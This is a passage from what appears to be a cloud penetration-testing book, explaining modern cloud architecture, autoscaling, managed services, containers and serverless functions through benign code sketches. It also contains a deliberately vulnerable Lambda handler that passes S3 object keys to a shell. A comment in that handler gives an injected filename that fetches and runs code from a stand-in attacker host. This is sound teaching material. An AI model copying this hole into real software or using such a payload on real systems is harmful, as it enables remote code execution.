Exploring how modern cloud applications are designed, developed, and deployed

One of the primary objectives when building our penetration testing labs is to prepare a vulnerable-by-design environment that mimics real cloud environments. To do this well, we must have a good understanding of what modern cloud applications look like, as this equips us with the knowledge required to build the right environment for our needs.

Years ago, most applications that were deployed in the cloud were designed and developed as monolithic applications. This means that the frontend, backend, and database layers of the application’s architecture were built together as a single logical unit. Most of the time, multiple developers would work on a single code repository for a project. In addition to this, the entire application, along with the database, would most likely be deployed together as a single unit inside the same server or virtual machine (similar to what’s shown in the simplified diagram in Figure 1.3):

Figure 1.3 – Deployment of monolithic applications (simplified)

From a security standpoint, an attacker who is able to get root access to the virtual machine hosting the application server would most likely be able to access and steal sensitive information stored in the database running on the same machine.

What do we mean by root access?

Root access refers to having complete administrative privileges and unrestricted control over a computer system or virtual machine. It grants the user the highest level of access and authority, enabling them to modify system files, install or uninstall software, and perform actions that are typically restricted to other users. In the context of security, if an attacker obtains root access to a virtual machine hosting an application server, it implies they have gained full control of the system. This can potentially lead to unauthorized access to sensitive data stored in databases residing on the same machine.

Of course, some modern applications are still designed and architected as monolithic applications due to the benefits of this type of architecture. However, as we will see shortly, more teams around the world are starting with a distributed microservice architecture instead of a monolithic setup. One of the notable downsides of a monolithic architecture is that development teams may have problems scaling specific layers of the application once more users start to use the system. Once the application starts to slow down, teams may end up vertically scaling the virtual machine where the application is running. With vertical scaling, the resources of a single server, such as CPU and RAM, are increased by upgrading its hardware or moving to a more powerful machine, allowing that server to handle higher workloads. In contrast, horizontal scaling involves adding more servers to distribute the load, allowing each server to handle a portion of the overall traffic. Given that vertical scaling is generally more expensive than horizontal scaling in the long term, cloud architects recommend a distributed multi-tier setup instead, since it allows teams to scale only the infrastructure resources hosting the components of the application that actually require scaling.

For instance, in a distributed e-commerce application, instead of vertically scaling a single monolithic server to handle increased user traffic, the system can be designed with separate tiers for the web servers, application servers, and databases. By separating different tiers, it becomes possible to independently scale each tier based on its specific resource demands. For example, while the application server layer can scale horizontally to handle increased user traffic, the database layer can scale vertically to accommodate growing data storage requirements. This way, when traffic surges, the infrastructure can horizontally scale by adding more web servers to handle the increased load, resulting in a more cost-effective and scalable solution:

Figure 1.4 – Autoscaling setup

In addition to this, a distributed multi-tier setup can easily support the autoscaling of resources due to its inherent architectural design. This flexibility allows the system to automatically adjust resource allocation without manual intervention, ensuring optimal performance and resource utilization. If the traffic that’s received by the application is spiky or unpredictable, a cloud architect may consider having an autoscaling setup for specific layers of the application to ensure that the infrastructure resources hosting the application are not underutilized.
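
To make this concrete, here is a minimal sketch of how a target-tracking autoscaling policy could be attached to an existing Auto Scaling group on AWS using boto3. The group name, policy name, region, and target value are assumptions for illustration; in a real setup, these would match your own resources:

```python
import boto3

# Assumed names for illustration: the Auto Scaling group "app-tier-asg"
# must already exist in the target account and region.
autoscaling = boto3.client("autoscaling", region_name="us-east-1")

# Target-tracking policy: instances are added or removed automatically so
# that average CPU utilization across the group stays near 50%.
autoscaling.put_scaling_policy(
    AutoScalingGroupName="app-tier-asg",
    PolicyName="keep-average-cpu-at-50",
    PolicyType="TargetTrackingScaling",
    TargetTrackingConfiguration={
        "PredefinedMetricSpecification": {
            "PredefinedMetricType": "ASGAverageCPUUtilization"
        },
        "TargetValue": 50.0,
    },
)
```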

Note

Security professionals must take into account that the scale-in (downsizing) operation of an autoscaling setup may delete resources automatically once the traffic received by the application goes down. It is also worth noting that misconfigured or incomplete autoscaling implementations often lack a properly configured log management setup (such as shipping logs to a central location) in production environments. This makes investigations harder, since logs stored only on the compromised infrastructure resources or servers might be deleted during an automated scale-in operation.
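
On AWS, one way to reduce this risk is to combine centralized log shipping with a termination lifecycle hook, which pauses instance termination long enough for logs to be exported. The sketch below is a minimal illustration with assumed resource names, not a complete setup; the actual log export would typically be handled by an agent or script that reacts to the hook:

```python
import boto3

autoscaling = boto3.client("autoscaling", region_name="us-east-1")

# Assumed group and hook names for illustration. The hook holds terminating
# instances in the Terminating:Wait state for up to 5 minutes, giving a log
# agent or script time to copy local logs off the instance before it is
# destroyed.
autoscaling.put_lifecycle_hook(
    AutoScalingGroupName="app-tier-asg",
    LifecycleHookName="export-logs-before-termination",
    LifecycleTransition="autoscaling:EC2_INSTANCE_TERMINATING",
    HeartbeatTimeout=300,
    DefaultResult="CONTINUE",  # proceed with termination if no signal arrives
)
```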

At this point, we should have a good idea of how the initial cloud applications were designed and deployed. Fast-forwarding to the present, here's what a modern application may look like:

Figure 1.5 – What a modern cloud architecture looks like

Wow! That escalated quickly! In Figure 1.5, we can see that in addition to what was discussed already, modern application architectures may have one or more of the following as well:

  • Usage of Infrastructure as Code (IaC) solutions to automatically provision cloud resources: While building a modern cloud application, an organization could utilize IaC solutions to streamline the provisioning of cloud resources. For example, they might employ tools such as Terraform or AWS CloudFormation, defining their infrastructure requirements in code to automatically provision and configure resources such as virtual machines, storage, networking, and load balancers (see the short sketch after this list).
  • Usage of managed container services to ease the management of Kubernetes clusters: A company may opt to utilize managed container services to simplify the management of their Kubernetes clusters. For example, they could choose a managed Kubernetes service provided by a cloud platform, which would handle tasks such as cluster provisioning, scaling, and monitoring. This allows the company to focus on developing and deploying its application without the overhead of managing the underlying Kubernetes infrastructure.
  • A continuous integration and continuous deployment (CI/CD) pipeline: A company could set up a CI/CD pipeline to automate the process of integrating code changes, running tests, and deploying the application to the cloud. Developers would commit their code changes to a version control system, triggering an automated build process that compiles the code, runs tests, and generates artifacts. The CI/CD pipeline would then deploy the application to a staging environment for further testing and, upon successful validation, automatically promote it to a production environment.
  • Function-as-a-Service (FaaS) resources: An organization implementing a modern cloud application could utilize FaaS resources as part of their solution. For instance, they might design the application to leverage serverless functions to handle specific tasks or workflows. By breaking down the application into smaller, independent functions, the company can achieve greater scalability, reduce operational overhead, and improve resource utilization.
  • APIs consumed by web and mobile applications: A company could adopt a microservices architecture, where APIs are designed and exposed to be consumed by both web and mobile applications. In this scenario, the company would develop individual microservices that encapsulate specific functionalities and expose well-defined APIs. These APIs would then be consumed by the web and mobile applications. With this setup, there would be seamless communication and interaction between the frontend clients and the backend services.
  • Usage of managed firewalls and load balancers: An organization can leverage existing managed firewall services and solutions provided by their cloud provider, which would allow them to define and enforce security policies at the network level. In addition to this, they could utilize a load balancer service to distribute incoming traffic across multiple instances of their application. This will help ensure the scalability and high availability of modern cloud systems while removing the need to manage the underlying infrastructure and operating systems of these managed cloud resources.
  • Usage of artificial intelligence (AI) and machine learning (ML) services: A company implementing a modern cloud application could utilize AI-powered and ML-powered services by leveraging pre-trained models and APIs. For example, they could utilize an AI service for sentiment analysis to analyze customer feedback and improve user experience. In addition to this, they could also employ managed ML services for predictive analytics to enhance decision-making processes within the application.
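
To make the IaC item above concrete, here is a minimal sketch that provisions a single S3 bucket through AWS CloudFormation using boto3. The stack name and inline template are assumptions for illustration; real-world templates describe entire environments, including virtual machines, networking, and load balancers:

```python
import boto3

# A deliberately tiny inline CloudFormation template (illustrative only).
TEMPLATE = """
AWSTemplateFormatVersion: '2010-09-09'
Resources:
  LabArtifactsBucket:
    Type: AWS::S3::Bucket
"""

cfn = boto3.client("cloudformation", region_name="us-east-1")

# Create the stack and block until provisioning finishes.
cfn.create_stack(StackName="pentest-lab-stack", TemplateBody=TEMPLATE)
cfn.get_waiter("stack_create_complete").wait(StackName="pentest-lab-stack")
print("Stack provisioned")
```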

There has also been an observable global shift toward managed services as more companies migrate their workloads to the cloud. The managed services provided by cloud platforms have gradually replaced specific components in the system that were originally maintained manually by a company's internal system administration team. For instance, companies are leveraging managed services such as Google Cloud Pub/Sub instead of setting up their own messaging systems such as RabbitMQ. This approach allows organizations to focus their valuable time and resources on other critical business requirements.
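
As a brief illustration of the managed-messaging example above, here is a minimal sketch that publishes a message to a Google Cloud Pub/Sub topic using the official Python client. The project and topic names are assumptions, and the topic would need to exist already:

```python
from google.cloud import pubsub_v1

# Assumed project and topic names for illustration.
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path("my-demo-project", "order-events")

# publish() returns a future; result() blocks until the server-assigned
# message ID is available.
future = publisher.publish(topic_path, data=b"order created", order_id="12345")
print(f"Published message {future.result()}")
```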

With managed services, a major portion of the maintenance work is handled and automated by the cloud platform instead of a company’s internal team members. Here are some of the advantages when using managed services:

  • Server security patches and operational maintenance work are handled internally by the cloud platform when using managed services. This allows the company's internal team members to spend their time on other important requirements. A good example would be Amazon SageMaker, where data scientists and ML engineers can concentrate on training and deploying ML models without having to worry about manual maintenance tasks.
  • Scaling is generally easier when using managed services, as resources can easily be modified and scaled with an API call or through a user interface. In some cases, resources can easily have autoscaling configured. When it comes to scaling, Azure Kubernetes Service (AKS) would be a great example, as it enables easy resource scaling and adjustment of the number of pods running in the cluster.
  • Deployed cloud resources generally come with reliable monitoring and management tools already in place. In addition to this, integration with other services from the same cloud platform is seamless and immediately available. At the same time, managed cloud services and resources usually have built-in, practical automation features that are immediately available for use.

Note

Security professionals need to have a good idea of what’s possible and what’s not when managed services are used. For example, we are not able to access the underlying operating system of certain managed services as these were designed and implemented that way. A good example would be the managed NAT Gateway of the AWS cloud platform. In addition to this, security professionals need to be aware of other possible mechanisms available when using managed services. For example, in Amazon Aurora (a relational database management system built for the cloud), we also have the option to do passwordless authentication using an Identity and Access Management (IAM) role. This means that if an attacker manages to exfiltrate AWS credentials with the right set of permissions, the database records can be accessed and modified even without the database’s username and password.
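
To illustrate the passwordless authentication mechanism mentioned in this note, here is a minimal sketch of IAM database authentication against an Aurora MySQL-compatible cluster using boto3 and PyMySQL. The endpoint, username, and CA bundle path are placeholders, and the database user must have been created with IAM authentication enabled beforehand:

```python
import boto3
import pymysql

DB_HOST = "mydb.cluster-abc123.us-east-1.rds.amazonaws.com"  # assumed endpoint
DB_USER = "iam_app_user"  # assumed user configured for IAM authentication

# Generate a short-lived authentication token signed with the caller's
# AWS credentials -- no database password is involved.
rds = boto3.client("rds", region_name="us-east-1")
token = rds.generate_db_auth_token(DBHostname=DB_HOST, Port=3306, DBUsername=DB_USER)

# Connect using the token as the password. TLS is required for IAM
# authentication; the CA bundle path below is a placeholder.
connection = pymysql.connect(
    host=DB_HOST,
    port=3306,
    user=DB_USER,
    password=token,
    ssl={"ca": "/path/to/global-bundle.pem"},
)
```

This is exactly why exfiltrated AWS credentials with the relevant rds-db:connect permission can be enough to reach the data, even without the database's username and password.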

There has been a significant increase in the usage of containers over the last couple of years. If you are wondering what containers are, they are simply lightweight, isolated environments that package applications and their dependencies to guarantee consistency and portability. Container images, on the other hand, act as self-contained executable packages comprising the necessary files and configurations for running specific applications. Companies opt for containers because they offer quicker launch times, the ability to host multiple containers in one virtual machine, and consistent environments throughout the various development stages. Initially, companies were hesitant to use Docker containers for deployment in production. However, due to the latest advances and the release of production-ready tools such as Kubernetes, Docker Compose, and other similar container frameworks, more companies around the world have been using containers to host applications.

At this point, you might be wondering, What are the advantages of using containers? Here are a few reasons why companies would opt to utilize containers:

  • Launching new containers from container images is generally faster than creating new virtual machines from machine images (see the short sketch after this list). This is because containers leverage lightweight virtualization and share the host system's operating system, allowing them to start quickly without the need to boot an entire operating system. In addition to this, containers only require the necessary dependencies and libraries specific to the application, resulting in smaller image sizes and faster deployment times.
  • We can have multiple containers running inside a single virtual machine, which offers significant benefits in terms of resource utilization and scalability. Each container operates independently, allowing processes and services to be isolated while sharing the underlying resources of the virtual machine. This enables efficient utilization of computing resources, as multiple containers can run concurrently on the same hardware, optimizing the utilization of CPU, memory, and storage.
  • Using containers allows for seamless consistency across different environments, such as local development, staging, and production. With containerization, developers can package all necessary dependencies and configurations, ensuring that the application runs consistently across these environments. This approach promotes early consideration of environment consistency, enabling developers to detect and address any compatibility or deployment issues at an earlier stage in the development life cycle, leading to smoother deployments and reduced chances of environment-related errors.
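
As a small illustration of the first two points, the sketch below uses the Docker SDK for Python to start two isolated web server containers on the same host within seconds. The image, container names, and port mappings are arbitrary choices, and a local Docker daemon is assumed to be running:

```python
import docker

# Assumes a local Docker daemon is available.
client = docker.from_env()

# Launch two isolated nginx containers on the same host, each mapped to a
# different host port -- far faster than booting two virtual machines.
web_1 = client.containers.run("nginx:alpine", detach=True, name="web-1",
                              ports={"80/tcp": 8080})
web_2 = client.containers.run("nginx:alpine", detach=True, name="web-2",
                              ports={"80/tcp": 8081})

for container in (web_1, web_2):
    print(container.name, container.status)

# Clean up when done.
for container in (web_1, web_2):
    container.stop()
    container.remove()
```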

In addition to these, many managed cloud services nowadays already support the use of custom container environments, which gives developers the flexibility they need while ensuring that minimal work is done on the maintenance end. By leveraging these managed cloud services, developers can focus on application development and innovation while offloading the burden of infrastructure maintenance and ensuring optimal performance, scalability, and security for their containerized applications.

Note

Imagine a company developing a microservices-based application. By leveraging containers, they can encapsulate each microservice within its own container, allowing for independent development, testing, and deployment. This modular approach enables teams to iterate and update specific services without impacting the entire application stack. Furthermore, containers facilitate seamless scaling as demand fluctuates. When the application experiences increased traffic, container orchestration platforms such as Kubernetes automatically spin up additional instances of the required containers, ensuring optimal performance and resource utilization. This scalability allows businesses to efficiently handle peak loads without overprovisioning infrastructure.

That said, having a solid understanding of container security is critical due to the growing popularity of containers. Containers present unique security challenges that must be addressed to protect applications and data. By implementing effective container security measures, organizations can mitigate risks (such as unauthorized access, data breaches, and container breakouts) to ensure the security of critical systems and sensitive information.

Similar to containers, there's also been a noticeable increase in the usage of FaaS services in the past couple of years. FaaS options from major cloud platforms, including AWS Lambda, Azure Functions, and Google Cloud Functions, allow developers and engineers to deploy and run custom application code inside isolated environments without having to worry about server management. Previously, developers had to handle server provisioning and configuration. With serverless functions, however, developers can focus on writing and deploying custom application code without worrying about infrastructure, resulting in a more efficient and streamlined development process. This shift enables rapid iteration, scalable deployments, and reduced operational overhead, significantly simplifying the lives of developers. Using these along with the other building blocks of event-driven architectures, developers can divide complex application code into smaller, more manageable components. To better understand how these services work, let's quickly discuss some of the common properties of these cloud functions (a minimal sketch follows the list):

  • Scaling up and down is automatic
  • Usage follows a pay-per-use model
  • The runtime environment gets created and deleted when a function is invoked
  • No maintenance is needed since the cloud platform takes care of the maintenance work
  • There are resource limits on maximum execution time, memory, storage, and code package size
  • Functions are triggered by events
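
To tie these properties together, here is a minimal sketch of what such a function can look like on AWS Lambda. The event shape and response format are assumptions for illustration (they depend on the trigger wired to the function):

```python
import json

def lambda_handler(event, context):
    # Invoked by an event (for example, an API Gateway request or an S3
    # upload). The execution environment is provisioned, billed per use,
    # and recycled by the platform -- there are no servers to patch or
    # scale manually.
    name = event.get("name", "world")
    return {
        "statusCode": 200,
        "body": json.dumps({"message": f"Hello, {name}!"}),
    }
```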

Important note

The terms FaaS and serverless computing are sometimes used interchangeably by professionals. However, they are two different concepts. FaaS primarily focuses on having a platform that speeds up the development and deployment of application code functions. Serverless computing, on the other hand, refers to a cloud computing execution model that is generally characterized by event-driven architecture, managed services, and per-usage billing. That said, it is possible to have a serverless implementation without utilizing a FaaS service (for example, a frontend-only single-page application (SPA) hosted using the static website hosting capability of a cloud storage service, as sketched below).
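
As a quick illustration of that last point, here is a minimal sketch that enables static website hosting on an existing S3 bucket with boto3, giving a serverless deployment that involves no FaaS service at all. The bucket name is an assumption, and a real setup would also need the SPA files uploaded and public access configured appropriately:

```python
import boto3

s3 = boto3.client("s3")

# Assumed bucket name; the bucket must already exist and contain the files.
s3.put_bucket_website(
    Bucket="my-spa-bucket",
    WebsiteConfiguration={
        "IndexDocument": {"Suffix": "index.html"},
        "ErrorDocument": {"Key": "error.html"},
    },
)
```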

How is this relevant to cloud security and penetration testing? The design and implementation of cloud functions impact and influence the offensive and defensive security strategies of professionals. Developers and engineers need to make sure that the code deployed inside cloud functions is safe from a variety of injection attacks. For one thing, saving a file inside a storage bucket with a filename that includes a malicious payload may trigger command execution once an event triggers the cloud function (see the deliberately vulnerable sketch below). In addition to this, security professionals must find alternative ways of maintaining persistence (after a successful breach) when dealing with cloud functions, since the runtime environment gets created and deleted in seconds.
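
The deliberately vulnerable sketch below illustrates that filename-based injection scenario. It is a hypothetical AWS Lambda handler wired to S3 event notifications; details such as the URL encoding of object keys in real events are glossed over, and the dangerous part is passing the attacker-controllable key to a shell:

```python
import os

def lambda_handler(event, context):
    # S3 event notification: the object key is controlled by whoever
    # named the uploaded file.
    key = event["Records"][0]["s3"]["object"]["key"]

    # VULNERABLE: the key is interpolated directly into a shell command.
    # An object named "report.txt; curl https://attacker.example/x | sh"
    # turns this into two commands, the second of which is attacker-chosen.
    os.system(f"file /tmp/{key}")
```

Invoking the shell with an unsanitized value is the root cause here; passing arguments as a list to subprocess (or avoiding the shell entirely) removes this particular class of injection.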

At this point, you should have a good idea of what modern cloud applications look like! There is a lot more we could discuss in this section, but this should do the trick for now. With everything we have learned so far, we can now proceed with diving deeper into what we should consider when designing and building penetration testing lab environments in the cloud.
